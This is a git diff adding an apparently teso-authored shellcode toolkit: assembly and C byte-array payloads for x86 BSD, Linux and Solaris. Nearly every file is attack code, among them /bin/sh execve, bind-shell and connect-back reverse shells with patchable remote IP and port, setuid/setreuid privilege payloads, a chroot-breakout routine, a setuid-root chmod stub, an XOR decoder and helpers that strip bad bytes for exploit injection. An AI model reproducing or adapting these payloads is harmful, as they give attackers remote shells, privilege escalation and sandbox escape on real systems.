/dev/null +++ b/other/shellkit/x86_bsd.h @@ -0,0 +1,12 @@ + +#ifndef X86_BSD_H +#define X86_BSD_H + +#include "x86.h" +#include "shellcode.h" + +arch x86_bsd; + + +#endif + diff --git a/other/shellkit/x86_bsd.o b/other/shellkit/x86_bsd.o new file mode 100644 index 0000000..0b42a2c Binary files /dev/null and b/other/shellkit/x86_bsd.o differ diff --git a/other/shellkit/x86_bsd/FIXME_chmod.s b/other/shellkit/x86_bsd/FIXME_chmod.s new file mode 100644 index 0000000..6f19d23 --- /dev/null +++ b/other/shellkit/x86_bsd/FIXME_chmod.s @@ -0,0 +1,43 @@ +/* x86/BSD PIC local chmod code + * + * by stealth + */ + + .globl cbegin + .globl cend + +cbegin: + jmp boomsh + +foo: popl %ebx + incl (%ebx) + incl 4(%ebx) + + xorl %eax, %eax + movb %al, 11(%ebx) + + movb $16, %al /* chown */ + xorl %ecx, %ecx + pushl %ecx + pushl %ecx + pushl %ebx + pushl $1 +sys_1: int $0x80 + + xorl %eax, %eax /* chmod */ + movb $15, %al + pushw $06755 + pushl %ebx + pushl $1 +sys_2: int $0x80 + + xorl %eax, %eax + incl %eax /* exit */ + pushl $1 +sys_3: int $0x80 + +boomsh: call foo + .string ".tmp.boomsh."; +cend: + + diff --git a/other/shellkit/x86_bsd/bindshell.s b/other/shellkit/x86_bsd/bindshell.s new file mode 100644 index 0000000..8921fa9 --- /dev/null +++ b/other/shellkit/x86_bsd/bindshell.s @@ -0,0 +1,59 @@ +/* x86/BSD bindsh shellcode (73 bytes) + + lorian / teso +*/ + + .globl _cbegin + .globl cbegin + .globl _cend + .globl cend + +_cbegin: +cbegin: + xorl %ebx, %ebx + mull %ebx + pushl %ebx + incl %ebx + pushl %ebx + incl %ebx + pushl %ebx + movb $0x61, %al + pushl %ebx + int $0x80 + xchgl %esi, %eax + pushl %edx + pushw $0x4444 + pushw %bx + movl %esp, %ebp + pushl $0x10 + pushl %ebp + pushl %esi + pushl %esi + pushl $0x68 + popl %eax + int $0x80 + movb $0x6a, %al + int $0x80 + pusha + movb $0x1e, %al + int $0x80 +a: + pushl %ebx + pushl %eax + pushl %eax + movb $0x5a, %al + int $0x80 + decl %ebx + jns a + pushl %edx + movl %esp, %ebx + push $0x68732F6E + push $0x69622F2F + pusha + popl %esi + popl %esi + movb $0x3b, %al + int $0x80 + +_cend: +cend: diff --git a/other/shellkit/x86_bsd/connectsh b/other/shellkit/x86_bsd/connectsh new file mode 100644 index 0000000..f9aaab7 Binary files /dev/null and b/other/shellkit/x86_bsd/connectsh differ diff --git a/other/shellkit/x86_bsd/connectsh.s b/other/shellkit/x86_bsd/connectsh.s new file mode 100644 index 0000000..562f5ef --- /dev/null +++ b/other/shellkit/x86_bsd/connectsh.s @@ -0,0 +1,51 @@ +/* x86/BSD connectsh shellcode (66 bytes) + + lorian / teso +*/ + + .globl _cbegin + .globl cbegin + .globl _cend + .globl cend + +_cbegin: +cbegin: + xorl %ebp, %ebp + mull %ebp + pushl %ebp + incl %ebp + pushl %ebp + incl %ebp + pushl %ebp + movb $0x61, %al + pushl %ebp + int $0x80 + xchgl %esi, %eax + pushl $0xcab058c3 + pushw $0x4444 + pushw %bp + movl %esp, %edi + pushl $0x10 + pushl %edi + pushl %esi + pushl %esi + pushl $0x62 + popl %eax + int $0x80 +a: pusha + movb $0x5a, %al + int $0x80 + decl %ebp + jns a + pushl %edx + movl %esp, %ebx + push $0x68732F6E + push $0x69622F2F + pusha + popl %esi + popl %esi + movb $0x3b, %al + int $0x80 + +_cend: +cend: diff --git a/other/shellkit/x86_bsd/execvesh b/other/shellkit/x86_bsd/execvesh new file mode 100644 index 0000000..7518768 Binary files /dev/null and b/other/shellkit/x86_bsd/execvesh differ diff --git a/other/shellkit/x86_bsd/execvesh.s b/other/shellkit/x86_bsd/execvesh.s new file mode 100644 index 0000000..370e7a4 --- /dev/null +++ b/other/shellkit/x86_bsd/execvesh.s @@ -0,0 +1,31 @@ +/* x86/BSD execve /bin/sh shellcode + * + * lorian / teso + */ + +/* somehow the obsd on plan9 where i tested it, needs the labels + * exported with _ before, while freebsd doesnt + */ + +/* argv: OBSD needs a pointer to NULL, FBSD accepts NULL */ + + .globl cbegin + .globl _cbegin + .globl cend + .globl _cend + +_cbegin: +cbegin: + pushl $0x3b + popl %eax + cdq + pushl %edx + movl %esp, %ebx + push $0x68732F6E + push $0x69622F2F + pusha /* FULLPOWER */ + pop %esi + pop %esi + int $0x80 +_cend: +cend: diff --git a/other/shellkit/x86_bsd/exit.s b/other/shellkit/x86_bsd/exit.s new file mode 100644 index 0000000..7993035 --- /dev/null +++ b/other/shellkit/x86_bsd/exit.s @@ -0,0 +1,18 @@ +/* x86/BSD exit shellcode + * + * lorian / teso + */ + .globl cbegin + .globl _cbegin + .globl cend + .globl _cend + +_cbegin: +cbegin: + + xorl %eax, %eax + incl %eax + int $0x80 + +_cend: +cend: diff --git a/other/shellkit/x86_bsd/spset.s b/other/shellkit/x86_bsd/spset.s new file mode 100644 index 0000000..9bc19f4 --- /dev/null +++ b/other/shellkit/x86_bsd/spset.s @@ -0,0 +1,36 @@ +/* x86 spset shellcode + * + * lorian / teso + */ + .globl cbegin + .globl _cbegin + .globl cend + .globl _cend + +/* searches for 512 bytes "free" space on stack without destroying it + * like any kind of call would do... + * + * NOTE: your real shellcode must be terminated with + * \x78\x56\x34\x12 for this code to work... + */ + +_cbegin: +cbegin: + + movl $0x12345678, %eax +a: + cdq + movb $0x02, %dh +b: + popl %ebx + pushl %ebx + incl %esp + decl %edx + jz c + cmpl %eax, %ebx + je a + jmp b +c: + +_cend: +cend: diff --git a/other/shellkit/x86_linux.c b/other/shellkit/x86_linux.c new file mode 100644 index 0000000..d8b6398 --- /dev/null +++ b/other/shellkit/x86_linux.c @@ -0,0 +1,352 @@ +/* FIXME: needs cleanup -sc + */ + +#include +#include +#include +#include "shellcode.h" + + +/* ATTENTION: this must be first of concated shellcodes and the last + one must be terminated with x86_TERMINATOR */ +shellcode x86_linux_spset = { + "x86-linux-spset", + 20, + "\xb8\x78\x56\x34\x12\x99\xb6\x02\x5b\x53\x44\x4a" + "\x74\x06\x39\xc3\x74\xf3\xeb\xf4", +}; + + +shellcode x86_linux_execvesh = { + "x86-linux-execvesh", + 23, + "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f" + "\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80", +}; + + +shellcode x86_linux_exit = { + "x86-linux-exit", + 5, + "\x31\xc0\x40\xcd\x80", +}; + + +shellcode x86_linux_setgid = { + "x86-linux-setgid", + 14, + "\x6a\x2e\x58\x66\xbb\x41\x41\x66\x81\xf3\x42\x42" + /* ^^ ^^ xor'ed with ^^ ^^ is the uid */ + "\xcd\x80", +}; + + +shellcode x86_linux_setuid = { + "x86-linux-setuid", + 14, + "\x6a\x17\x58\x66\xbb\x41\x41\x66\x81\xf3\x42\x42" + /* ^^ ^^ xor'ed with ^^ ^^ is the uid */ + "\xcd\x80", +}; + + +shellcode x86_linux_setreuid = { + "x86-linux-setreuid", + 23, + "\x6a\x46\x58\x66\xbb\x41\x41\x66\x81\xf3\x41\x41" + /* ^^ ^^ ^^ ^^ */ + "\x66\xb9\x42\x42\x66\x81\xf1\x42\x42\xcd\x80", + /* ^^ ^^ ^^ ^^ */ +}; + + +shellcode x86_linux_chmod = { + "x86-linux-chmod", + 22, + "\xeb\x0f\x31\xc0\x5b\x88\x43\x00" + /* ^^ file name length */ + "\xb9\x41\x41\x41\x41\xb0\x0f\xcd\x80\xe8\xec\xff" + /* ^^ ^^ ^^ ^^ mode */ + "\xff\xff", +}; + + +shellcode x86_linux_chroot = { + "x86-linux-chroot", + 42, + "\x99\xb9\x50\x73\x50\x73\x50\x68\x41\x41\x2e\x2e" + "\x89\xe3\xb0\x27\xcd\x80\xb0\x3d\xcd\x80\x80\xc3" + "\x02\xfe\xc2\xb0\x0c\xcd\x80\x80\xfa\x6a\x75\xf5" + "\xfe\xc3\xb0\x3d\xcd\x80", +}; + + +shellcode x86_linux_portshellsh = { + "x86-linux-portshellsh", + 94, + "\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50" + "\x89\xe1\xb0\x66\xcd\x80\x52\x66\x68\x50\x73\x66" + /* ^^ ^^ */ + "\x52\x89\xe2\x6a\x10\x52\x50\x89\xe1\xfe\xc3\x89" + "\xc2\xb0\x66\xcd\x80\x80\xc3\x02\xb0\x66\xcd\x80" + "\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc3" + "\x31\xc9\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80" + "\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f" + "\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80", +}; + + +shellcode x86_linux_connectsh = { + "x86-linux-connectsh", + 88, + "\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50" + "\x89\xe1\xb0\x66\xcd\x80\xb9\x41\x41\x41\x41\x81" + /* ^^ ^^ ^^ ^^ */ + "\xf1\x3e\x41\x41\x40\x51\x66\x68\x50\x74\x66\x52" + /* ^^ ^^ ^^ ^^ ^^ ^^ */ + "\x89\xe1\x89\xc2\x6a\x10\x51\x52\x89\xe1\xb3\x03" + "\xb0\x66\xcd\x80\x89\xd3\x31\xc9\xb0\x3f\xcd\x80" + "\xfe\xc1\xb0\x3f\xcd\x80\xb0\x0b\x99\x52\x68\x6e" + "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53" + "\x89\xe1\xcd\x80", +}; + + +shellcode x86_linux_read = { + "x86-linux-read", + 16, + "\xeb\x0e\xb2\xfa\x59\x6a\x41\x5b\x80\xf3\x41\x6a" + "\x03\x58\xcd\x80", +}; + + +shellcode *x86_linux_shellcodes[] = { + &x86_linux_chmod, + &x86_linux_chroot, + &x86_linux_connectsh, + &x86_linux_execvesh, + &x86_linux_exit, + &x86_linux_portshellsh, + &x86_linux_read, + &x86_linux_setgid, + &x86_linux_setuid, + &x86_linux_setreuid, + &x86_linux_spset, + NULL, +}; + + +arch x86_linux = { + "x86-linux", + 1, + NULL, /* for nops use the same function as in arch bsd */ + x86_linux_shellcodes +}; + + +int +isLegal (unsigned char x) /* XXX: Move this to a global position */ +{ + switch (x) { + case 0x00: + case 0x0a: + case 0x0d: + case 0x25: + return 0; + } + return 1; +} + + +unsigned short int +getxorer (unsigned short int value) +{ + unsigned short int xor = 0x8f8f, temp; + + + temp = (xor ^ value) & 0xff00; + switch (temp) { + case 0x0000 : + case 0x0a00 : + case 0x0d00 : + case 0x2500 : xor^=0x8000; + break; + } + + temp = (xor ^ value) & 0xff; + switch (temp) { + case 0x00 : + case 0x0a : + case 0x0d : + case 0x25 : xor^=0x80; + break; + } + + return xor; +} + + +unsigned long int +getxorer4 (unsigned long int v) +{ + unsigned long int xor = 0x8f8f8f8f, + temp, + x; + + + for (x = 0; x < 4; x++) { + temp = ((xor ^ v) >> (x * 8)) & 0xff; + if (!isLegal (temp)) { + xor ^= (0x80 << (x * 8)); + } + } + + return xor; +} + + +void +x86_linux_chmod_setup (unsigned char *code, unsigned char *file, + unsigned long int mode) +{ + unsigned char length = 0; + + + length = strlen (file); + if (length > 255 || !isLegal (length)) { + printf ("Change length of file name. code will be left unchanged.\n"); + return; + } + code[7] = length; + +/* XXX: WRITE ME! */ + + return; +} + + +void +x86_linux_setgid_setup (unsigned char *code, unsigned short int gid) +{ + unsigned short xor = 0; + + + xor = getxorer (gid); + + code[10] = xor & 0xff; + code[11] = (xor >> 8) & 0xff; + + gid ^= xor; + + code[5] = gid & 0xff; + code[6] = (gid >> 8) & 0xff; + + return; +} + + +void +x86_linux_setuid_setup (unsigned char *code, unsigned short int uid) +{ + unsigned short xor = 0; + + + xor = getxorer (uid); + + code[10] = xor & 0xff; + code[11] = (xor >> 8) & 0xff; + + uid ^= xor; + + code[5] = uid & 0xff; + code[6] = (uid >> 8) & 0xff; + + return; +} + + +void +x86_linux_setreuid_setup (unsigned char *code, + unsigned short int ruid, unsigned short int euid) +{ + unsigned short xor_a = 0, + xor_b = 0; + + + xor_a = getxorer (ruid); + xor_b = getxorer (euid); + + code[10] = xor_a & 0xff; + code[11] = (xor_a >> 8) & 0xff; + + code[19] = xor_b & 0xff; + code[20] = (xor_b >> 8) & 0xff; + + ruid ^= xor_a; + euid ^= xor_b; + + code[5] = ruid & 0xff; + code[6] = (ruid >> 8) & 0xff; + + code[14] = euid & 0xff; + code[15] = (euid >> 8) & 0xff; + + return; +} + + +void +x86_linux_portshell_setup (unsigned char *code, unsigned short int port) +{ + port = htons (port); + + if (!isLegal(port & 0xff) || !isLegal((port & 0xff00) >> 8)) { + printf ("Error:\t choosen port would produced illegal bytes.\n"); + printf ("\t code will be left unchanged.\n"); + return; + } + + code[22] = (port >> 8) & 0xff; + code[21] = port & 0xff; + + return; +} + + +void +x86_linux_connectshell_setup (unsigned char *code, + unsigned long int raddr, + unsigned short int rport) +{ + unsigned long int raddr_xor = 0; + + + rport = htons (rport); + if (!isLegal(rport & 0xff) || !isLegal((rport & 0xff00) >> 8)) { + printf ("Error:\t choosen remote port would produced illegal bytes.\n"); + printf ("\t code will be left unchanged.\n"); + + return; + } + + raddr_xor = getxorer4 (raddr); + + raddr ^= raddr_xor; + + code[22] = (raddr_xor >> 24) & 0xff; + code[21] = (raddr_xor >> 16) & 0xff; + code[20] = (raddr_xor >> 8) & 0xff; + code[19] = raddr_xor & 0xff; + + code[28] = (raddr >> 24) & 0xff; + code[27] = (raddr >> 16) & 0xff; + code[26] = (raddr >> 8) & 0xff; + code[25] = raddr & 0xff; + + code[33] = (rport >> 8) & 0xff; + code[32] = rport & 0xff; + + return; +} + + diff --git a/other/shellkit/x86_linux.h b/other/shellkit/x86_linux.h new file mode 100644 index 0000000..a145c34 --- /dev/null +++ b/other/shellkit/x86_linux.h @@ -0,0 +1,32 @@ + +#ifndef X86_LINUX_H +#define X86_LINUX_H + +#include "x86.h" +#include "shellcode.h" + +arch x86_linux; + + +void +x86_linux_chmod_setup (unsigned char *, unsigned char *, unsigned long int); + +void +x86_linux_setgid_setup (unsigned char *, unsigned short int); + +void +x86_linux_setuid_setup (unsigned char *, unsigned short int); + +void +x86_linux_setreuid_setup (unsigned char *, + unsigned short int, unsigned short int); + +void +x86_linux_portshell_setup (unsigned char *, unsigned short int); + +void +x86_linux_connectshell_setup (unsigned char *, + unsigned long int, unsigned short int); + +#endif + diff --git a/other/shellkit/x86_linux.o b/other/shellkit/x86_linux.o new file mode 100644 index 0000000..d992733 Binary files /dev/null and b/other/shellkit/x86_linux.o differ diff --git a/other/shellkit/x86_linux/AUTHORS b/other/shellkit/x86_linux/AUTHORS new file mode 100644 index 0000000..e5ad29f --- /dev/null +++ b/other/shellkit/x86_linux/AUTHORS @@ -0,0 +1,5 @@ +files by: +palmers / teso + +changed by: +lorian / teso diff --git a/other/shellkit/x86_linux/chmod.s b/other/shellkit/x86_linux/chmod.s new file mode 100644 index 0000000..63efd8b --- /dev/null +++ b/other/shellkit/x86_linux/chmod.s @@ -0,0 +1,23 @@ + + .globl cbegin + .globl cend + + +cbegin: + jmp file + +chmod: + xorl %eax, %eax + popl %ebx + movb %al, 0x4(%ebx) + movl $0x41414141, %ecx + + movb $0xf, %al + int $0x80 + +file: + call chmod + .ascii "" + +cend: + diff --git a/other/shellkit/x86_linux/chroot.s b/other/shellkit/x86_linux/chroot.s new file mode 100644 index 0000000..dd7e878 --- /dev/null +++ b/other/shellkit/x86_linux/chroot.s @@ -0,0 +1,34 @@ + .globl cbegin + .globl cend + + +cbegin: +/* mkdir AA.. */ + cdq + movl $0x73507350, %ecx + push %eax + push $0x2e2e4141 + movl %esp, %ebx + movb $0x27, %al + int $0x80 + +/* chroot AA.. */ + movb $0x3d, %al + int $0x80 + +/* chdir .. x 5 */ + addb $0x2, %bl + +cd_loop: + incb %dl + movb $0xc, %al + int $0x80 + cmp $0x6a, %dl + jne cd_loop + +/* chroot . */ + incb %bl + movb $0x3d, %al + int $0x80 +cend: + diff --git a/other/shellkit/x86_linux/codedump b/other/shellkit/x86_linux/codedump new file mode 100644 index 0000000..fe9bb8e Binary files /dev/null and b/other/shellkit/x86_linux/codedump differ diff --git a/other/shellkit/x86_linux/connect.s b/other/shellkit/x86_linux/connect.s new file mode 100644 index 0000000..452a1d4 --- /dev/null +++ b/other/shellkit/x86_linux/connect.s @@ -0,0 +1,61 @@ + .globl cbegin + .globl cend + +cbegin: + +/* socket */ + xorl %eax, %eax + cdq + push %eax + incb %al + movl %eax, %ebx + push %eax + incb %al + push %eax + movl %esp, %ecx + movb $0x66, %al + int $0x80 + +/* connect */ + movl $0x41414141, %ecx + xorl $0x4041413e, %ecx /* address: 127.0.0.1 */ + push %ecx + pushw $0x7450 + pushw %dx + movl %esp, %ecx + movl %eax, %edx + + push $0x10 + push %ecx + push %edx + movl %esp, %ecx + + movb $0x03, %bl + movb $0x66, %al + int $0x80 + +/* dup2 fd 0 + fd 1 */ + movl %edx, %ebx + xorl %ecx, %ecx + + movb $0x3f, %al + int $0x80 + + incb %cl + movb $0x3f, %al + int $0x80 + +/* execve shell (by lorian, see execve.s) - slightly modified */ + movb $0x0b, %al + cdq + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/execve b/other/shellkit/x86_linux/execve new file mode 100644 index 0000000..3a17d3f Binary files /dev/null and b/other/shellkit/x86_linux/execve differ diff --git a/other/shellkit/x86_linux/execve.s b/other/shellkit/x86_linux/execve.s new file mode 100644 index 0000000..2fdb69f --- /dev/null +++ b/other/shellkit/x86_linux/execve.s @@ -0,0 +1,22 @@ +/* x86/linux execve /bin/sh shellcode + * + * lorian / teso + */ + + .globl cbegin + .globl cend + +cbegin: + pushl $0x0b + popl %eax + cdq + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: diff --git a/other/shellkit/x86_linux/exit.s b/other/shellkit/x86_linux/exit.s new file mode 100644 index 0000000..1fe28f6 --- /dev/null +++ b/other/shellkit/x86_linux/exit.s @@ -0,0 +1,14 @@ +/* x86/linux exit shellcode + * + * lorian / teso + */ + .globl cbegin + .globl cend + +cbegin: + + xorl %eax, %eax + incl %eax + int $0x80 + +cend: diff --git a/other/shellkit/x86_linux/portshell.s b/other/shellkit/x86_linux/portshell.s new file mode 100644 index 0000000..31aa68c --- /dev/null +++ b/other/shellkit/x86_linux/portshell.s @@ -0,0 +1,73 @@ + .globl cbegin + .globl cend + +cbegin: + +/* socket */ + xorl %eax, %eax + cdq + push %eax + incb %al + movl %eax, %ebx + push %eax + incb %al + push %eax + movl %esp, %ecx + movb $0x66, %al + int $0x80 + +/* bind */ + push %edx + pushw $0x7350 + pushw %dx + movl %esp, %edx + + push $0x10 + push %edx + push %eax + movl %esp, %ecx + + incb %bl + movl %eax, %edx + movb $0x66, %al + int $0x80 + +/* listen */ + addb $0x02, %bl + movb $0x66, %al + int $0x80 + +/* accept */ + push %eax + push %edx + movl %esp, %ecx + + incb %bl + movb $0x66, %al + int $0x80 + +/* dup2 fd 0 + fd 1 */ + movl %eax, %ebx + xorl %ecx, %ecx + + movb $0x3f, %al + int $0x80 + + incb %cl + movb $0x3f, %al + int $0x80 + +/* execve shell (by lorian, see execve.s) - slightly modified */ + movb $0x0b, %al + cdq + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/portshell_slice.s b/other/shellkit/x86_linux/portshell_slice.s new file mode 100644 index 0000000..0d4c7b1 --- /dev/null +++ b/other/shellkit/x86_linux/portshell_slice.s @@ -0,0 +1,77 @@ + .globl cbegin + .globl cend + +cbegin: + +/* socket */ + xorl %eax, %eax + cdq + push %eax + incb %al + movl %eax, %ebx + push %eax + incb %al + push %eax + movl %esp, %ecx + movb $0x66, %al + int $0x80 + +/* bind */ + push %edx + pushw $0x7350 + pushw %dx + movl %esp, %edx + + push $0x10 + push %edx + push %eax + movl %esp, %ecx + + incb %bl + movl %eax, %edx + movb $0x66, %al + int $0x80 + +/* listen */ + addb $0x02, %bl + movb $0x66, %al + int $0x80 + +/* accept */ + push %eax + push %edx + movl %esp, %ecx + + incb %bl + movb $0x66, %al + int $0x80 + +/* dup2 fd 0 + fd 1 */ + movl %eax, %ebx + xorl %ecx, %ecx + + movb $0x3f, %al + int $0x80 + + incb %cl + movb $0x3f, %al + int $0x80 + +/* execve shell (by lorian, see execve.s) - slightly modified */ + movb $0x0b, %al + cdq + pushl %edx +/* push $0x68732F6E */ +/* push $0x69622F2F */ + pushw $0x6873 + pushw $0x2f6e + pushw $0x6962 + pushw $0x2f2f + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/read.s b/other/shellkit/x86_linux/read.s new file mode 100644 index 0000000..870d125 --- /dev/null +++ b/other/shellkit/x86_linux/read.s @@ -0,0 +1,22 @@ + .globl cbegin + .globl cend + +cbegin: + jmp cend + +rrr: + movb $0xfa, %dl /* length */ + + popl %ecx /* position */ + + push $0x41 + pop %ebx + xorb $0x41, %bl + + push $0x3 + pop %eax + int $0x80 /* read */ + +cend: + call rrr + diff --git a/other/shellkit/x86_linux/setgid.s b/other/shellkit/x86_linux/setgid.s new file mode 100644 index 0000000..0786804 --- /dev/null +++ b/other/shellkit/x86_linux/setgid.s @@ -0,0 +1,14 @@ + .globl cbegin + .globl cend + +cbegin: + +main: + pushb $0x2e + popl %eax + movw $0x4141, %ebx + xorw $0x4242, %ebx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/setreuid.s b/other/shellkit/x86_linux/setreuid.s new file mode 100644 index 0000000..c976312 --- /dev/null +++ b/other/shellkit/x86_linux/setreuid.s @@ -0,0 +1,16 @@ + .globl cbegin + .globl cend + +cbegin: + +main: + pushl $0x46 + popl %eax + movw $0x4141, %ebx + xorw $0x4141, %ebx + movw $0x4242, %ecx + xorw $0x4242, %ecx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/setuid.s b/other/shellkit/x86_linux/setuid.s new file mode 100644 index 0000000..e78410a --- /dev/null +++ b/other/shellkit/x86_linux/setuid.s @@ -0,0 +1,14 @@ + .globl cbegin + .globl cend + +cbegin: + +main: + pushb $0x17 + popl %eax + movw $0x4141, %ebx + xorw $0x4242, %ebx + int $0x80 + +cend: + diff --git a/other/shellkit/x86_linux/spset.s b/other/shellkit/x86_linux/spset.s new file mode 100644 index 0000000..9bc19f4 --- /dev/null +++ b/other/shellkit/x86_linux/spset.s @@ -0,0 +1,36 @@ +/* x86 spset shellcode + * + * lorian / teso + */ + .globl cbegin + .globl _cbegin + .globl cend + .globl _cend + +/* searches for 512 bytes "free" space on stack without destroying it + * like any kind of call would do... + * + * NOTE: your real shellcode must be terminated with + * \x78\x56\x34\x12 for this code to work... + */ + +_cbegin: +cbegin: + + movl $0x12345678, %eax +a: + cdq + movb $0x02, %dh +b: + popl %ebx + pushl %ebx + incl %esp + decl %edx + jz c + cmpl %eax, %ebx + je a + jmp b +c: + +_cend: +cend: diff --git a/other/shellkit/x86_linux/xor.s b/other/shellkit/x86_linux/xor.s new file mode 100644 index 0000000..29e3b78 --- /dev/null +++ b/other/shellkit/x86_linux/xor.s @@ -0,0 +1,24 @@ + .globl cbegin + .globl cend + +cbegin: + jmp XOR_down + +XOR_up: + popl %ebx + movb $0x26, %cl /* lenght */ + +XORLoop: + xorb $0x64, %bl /* xor key */ + incl %ebx + dec %cl + jnz XORLoop + jmp XORLoopDone + +XOR_down: + call XOR_up + +XORLoopDone: + .ascii "" + +cend: diff --git a/other/shellkit/x86_noptest.c b/other/shellkit/x86_noptest.c new file mode 100644 index 0000000..3c68ce0 --- /dev/null +++ b/other/shellkit/x86_noptest.c @@ -0,0 +1,25 @@ + +#include +#include +#include "shellcode.h" +#include "x86_bsd.h" + + +typedef void (* func_ptr)(void); + +int +main (int argc, char *argv[]) +{ + func_ptr fp; + unsigned char nopspace[20480]; + + x86_nop (nopspace, sizeof (nopspace), "\x25\x0d\x0a\x00", 4); + nopspace[sizeof (nopspace) - 1] = '\xcc'; + + fp = (func_ptr) nopspace; + fp (); + + exit (EXIT_SUCCESS); +} + + diff --git a/other/shellkit/x86_solaris/README b/other/shellkit/x86_solaris/README new file mode 100644 index 0000000..da1d06b --- /dev/null +++ b/other/shellkit/x86_solaris/README @@ -0,0 +1,7 @@ +x86/solaris shellcodes + +lorian/teso + +all shellcodes are untested for now, cause i dont have a solaris x86 +system to test on. could be that they all dont work... +will test as soon i install solaris x86 at home... (maybe within next week) diff --git a/other/shellkit/x86_solaris/bindshell.s b/other/shellkit/x86_solaris/bindshell.s new file mode 100644 index 0000000..1380747 --- /dev/null +++ b/other/shellkit/x86_solaris/bindshell.s @@ -0,0 +1,68 @@ +/* x86/BSD bindsh shellcode (89 bytes) + + lorian / teso +*/ + + .globl _cbegin + .globl cbegin + .globl _cend + .globl cend + +_cbegin: +cbegin: + movl $0x3cfff8ff, %eax + notl %eax + pushl %eax + xorl %ebx, %ebx + mull %ebx + movb $0x9a, %al + pushl %eax + movl %esp, %ecx + + pushl %ebx + incl %ebx + pushl %ebx + incl %ebx + pushl %ebx + movb $0xe6, %al + call *%ecx + + xchgl %esi, %eax + pushl %edx + pushw $0x4444 + pushw %bx + movl %esp, %ebp + pushl $0x10 + pushl %ebp + pushl %esi + xorl %eax, %eax + movb $0xe8, %al + call *%ecx + movb $0xe9, %al + call *%ecx + pusha + popl %edi + movb $0xea, %al + call *%ecx +a: + pushl %ebx + pushl %eax + movb $0x3e, %al + call *%ecx + decl %ebx + jns a + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %edi + pushl %edx + pushl %edi + pushl %ebx + movb $0x3b, %al + call *%ecx + +_cend: +cend: diff --git a/other/shellkit/x86_solaris/connectsh.s b/other/shellkit/x86_solaris/connectsh.s new file mode 100644 index 0000000..155015a --- /dev/null +++ b/other/shellkit/x86_solaris/connectsh.s @@ -0,0 +1,60 @@ +/* x86/solaris connectsh shellcode (83 bytes) + + lorian / teso +*/ + + .globl _cbegin + .globl cbegin + .globl _cend + .globl cend + +_cbegin: +cbegin: + movl $0x3cfff8ff, %eax + notl %eax + pushl %eax + xorl %ebp, %ebp + mull %ebp + movb $0x9a, %al + pushl %eax + movl %esp, %ecx + + pushl %ebp + incl %ebp + pushl %ebp + incl %ebp + pushl %ebp + movb $0xe6, %al + call *%ecx + xchgl %esi, %eax + pushl $0xcab058c3 + pushw $0x4444 + pushw %bp + movl %esp, %edi + pushl $0x10 + pushl %edi + pushl %esi + xorl %eax, %eax + movb $0xeb, %al + call *%ecx +a: pusha + pop %esi + movb $0x3e, %al + call *%ecx + decl %ebp + jns a + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %edi + pushl %edx + pushl %edi + pushl %ebx + movb $0x3b, %al + call *%ecx + +_cend: +cend: diff --git a/other/shellkit/x86_solaris/execve.s b/other/shellkit/x86_solaris/execve.s new file mode 100644 index 0000000..428a2fe --- /dev/null +++ b/other/shellkit/x86_solaris/execve.s @@ -0,0 +1,32 @@ +/* x86/solaris execve /bin/sh shellcode + * + * lorian / teso + */ + + .globl cbegin + .globl cend + +cbegin: + movl $0x3cfff8ff, %eax + notl %eax + pushl %eax + xorl %eax, %eax + cdq + movb $0x9a, %al + pushl %eax + movl %esp, %edi + + movb $0x3b, %al + pushl %edx + push $0x68732F6E + push $0x69622F2F + movl %esp, %ebx + pushl %edx + pushl %ebx + movl %esp, %ecx + pushl %edx + pushl %ecx + pushl %ebx + call *%edi + +cend: diff --git a/other/shellkit/x86_solaris/exit.s b/other/shellkit/x86_solaris/exit.s new file mode 100644 index 0000000..d332c6f --- /dev/null +++ b/other/shellkit/x86_solaris/exit.s @@ -0,0 +1,24 @@ +/* x86/solaris exit shellcode + * + * lorian / teso + */ + .globl cbegin + .globl _cbegin + .globl cend + .globl _cend + +_cbegin: +cbegin: + movl $0x3cfff8ff, %eax + notl %eax + pushl %eax + xorl %eax, %eax + movb $0x9a, %al + pushl %eax + movl %esp, %edi + movb $0x01, %al + call *%edi + + +_cend: +cend: -- cgit v1.3